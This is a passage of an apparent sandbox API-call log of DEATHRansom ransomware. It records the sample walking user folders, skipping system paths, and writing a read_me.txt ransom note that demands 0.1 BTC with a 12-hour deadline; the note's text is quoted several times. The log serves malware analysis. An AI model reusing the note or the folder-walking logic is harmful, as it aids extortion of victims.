pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0076.095] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.095] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0076.095] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0076.095] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.095] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\read_me.txt") returned 41 [0076.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\read_me.txt" (normalized: "c:\\users\\default\\contacts\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x79c [0076.096] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.096] WriteFile (in: hFile=0x79c, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.097] CloseHandle (hObject=0x79c) returned 1 [0076.097] GetProcessHeap () returned 0x4f10000 [0076.097] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0076.097] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Cookies", cAlternateFileName="")) returned 1 [0076.097] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Cookies") returned 28 [0076.097] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0076.097] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0076.097] StrStrW (lpFirst="cookies", lpSrch="programdata") returned 0x0 [0076.097] StrStrW (lpFirst="cookies", lpSrch="$recycle.bin") returned 0x0 [0076.097] StrStrW (lpFirst="cookies", lpSrch="program files") returned 0x0 [0076.098] StrStrW (lpFirst="cookies", lpSrch="windows") returned 0x0 [0076.098] StrStrW (lpFirst="cookies", lpSrch="all users") returned 0x0 [0076.098] StrStrW (lpFirst="cookies", lpSrch="appdata") returned 0x0 [0076.098] GetProcessHeap () returned 0x4f10000 [0076.098] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0076.098] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Users\\Default\\Cookies" | out: lpString1="\\\\?\\C:\\Users\\Default\\Cookies") returned="\\\\?\\C:\\Users\\Default\\Cookies" [0076.098] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 97 [0076.098] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0076.098] GetProcessHeap () returned 0x4f10000 [0076.098] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8df1108 [0076.099] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Cookies\\*") returned 30 [0076.099] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0076.099] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Cookies\\read_me.txt") returned 40 [0076.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Cookies\\read_me.txt" (normalized: "c:\\users\\default\\cookies\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x79c [0076.103] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.103] WriteFile (in: hFile=0x79c, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.104] CloseHandle (hObject=0x79c) returned 1 [0076.104] GetProcessHeap () returned 0x4f10000 [0076.104] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8df1108 | out: hHeap=0x4f10000) returned 1 [0076.104] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Desktop", cAlternateFileName="")) returned 1 [0076.104] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop") returned 28 [0076.104] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0076.104] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0076.104] StrStrW (lpFirst="desktop", lpSrch="programdata") returned 0x0 [0076.104] StrStrW (lpFirst="desktop", lpSrch="$recycle.bin") returned 0x0 [0076.104] StrStrW (lpFirst="desktop", lpSrch="program files") returned 0x0 [0076.104] StrStrW (lpFirst="desktop", lpSrch="windows") returned 0x0 [0076.104] StrStrW (lpFirst="desktop", lpSrch="all users") returned 0x0 [0076.104] StrStrW (lpFirst="desktop", lpSrch="appdata") returned 0x0 [0076.104] GetProcessHeap () returned 0x4f10000 [0076.104] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8df1108 [0076.105] lstrcpyW (in: lpString1=0x8df1108, lpString2="\\\\?\\C:\\Users\\Default\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop") returned="\\\\?\\C:\\Users\\Default\\Desktop" [0076.105] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 98 [0076.105] QueueUserWorkItem (Function=0x40a710, Context=0x8df1108, Flags=0x0) returned 1 [0076.105] GetProcessHeap () returned 0x4f10000 [0076.105] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c30010 [0076.106] wnsprintfW (in: pszDest=0x8c30010, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\*") returned 30 [0076.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.106] wnsprintfW (in: pszDest=0x8c30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\.") returned 30 [0076.106] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.106] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.106] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.106] wnsprintfW (in: pszDest=0x8c30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\..") returned 31 [0076.106] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.106] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.106] wnsprintfW (in: pszDest=0x8c30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned 40 [0076.106] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0076.106] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.107] wnsprintfW (in: pszDest=0x8c30010, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\read_me.txt") returned 40 [0076.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\read_me.txt" (normalized: "c:\\users\\default\\desktop\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x79c [0076.107] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.107] WriteFile (in: hFile=0x79c, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.108] CloseHandle (hObject=0x79c) returned 1 [0076.108] GetProcessHeap () returned 0x4f10000 [0076.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c30010 | out: hHeap=0x4f10000) returned 1 [0076.108] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0076.108] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents") returned 30 [0076.108] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0076.108] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0076.108] StrStrW (lpFirst="documents", lpSrch="programdata") returned 0x0 [0076.108] StrStrW (lpFirst="documents", lpSrch="$recycle.bin") returned 0x0 [0076.108] StrStrW (lpFirst="documents", lpSrch="program files") returned 0x0 [0076.108] StrStrW (lpFirst="documents", lpSrch="windows") returned 0x0 [0076.108] StrStrW (lpFirst="documents", lpSrch="all users") returned 0x0 [0076.108] StrStrW (lpFirst="documents", lpSrch="appdata") returned 0x0 [0076.108] GetProcessHeap () returned 0x4f10000 [0076.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c30010 [0076.108] lstrcpyW (in: lpString1=0x8c30010, lpString2="\\\\?\\C:\\Users\\Default\\Documents" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents") returned="\\\\?\\C:\\Users\\Default\\Documents" [0076.108] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 99 [0076.108] QueueUserWorkItem (Function=0x40a710, Context=0x8c30010, Flags=0x0) returned 1 [0076.108] GetProcessHeap () returned 0x4f10000 [0076.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c40018 [0076.109] wnsprintfW (in: pszDest=0x8c40018, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\*") returned 32 [0076.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.110] wnsprintfW (in: pszDest=0x8c40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\.") returned 32 [0076.110] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.110] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.110] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.110] wnsprintfW (in: pszDest=0x8c40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\..") returned 33 [0076.110] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.110] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.110] wnsprintfW (in: pszDest=0x8c40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0076.110] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0076.110] wnsprintfW (in: pszDest=0x8c40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Music") returned 39 [0076.110] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0076.110] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0076.110] StrStrW (lpFirst="my music", lpSrch="programdata") returned 0x0 [0076.110] StrStrW (lpFirst="my music", lpSrch="$recycle.bin") returned 0x0 [0076.110] StrStrW (lpFirst="my music", lpSrch="program files") returned 0x0 [0076.110] StrStrW (lpFirst="my music", lpSrch="windows") returned 0x0 [0076.110] StrStrW (lpFirst="my music", lpSrch="all users") returned 0x0 [0076.110] StrStrW (lpFirst="my music", lpSrch="appdata") returned 0x0 [0076.110] GetProcessHeap () returned 0x4f10000 [0076.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c50020 [0076.111] lstrcpyW (in: lpString1=0x8c50020, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\My Music" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Music") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Music" [0076.111] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 100 [0076.111] QueueUserWorkItem (Function=0x40a710, Context=0x8c50020, Flags=0x0) returned 1 [0076.111] GetProcessHeap () returned 0x4f10000 [0076.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b300a0 [0076.112] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*") returned 41 [0076.112] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x11, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="qwCPYTNwoNJY0y眕耚眵?\x17Ǭӱ眕耪眵擸ߗƜӱ", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0076.112] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\read_me.txt") returned 51 [0076.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\read_me.txt" (normalized: "c:\\users\\default\\documents\\my music\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8fc 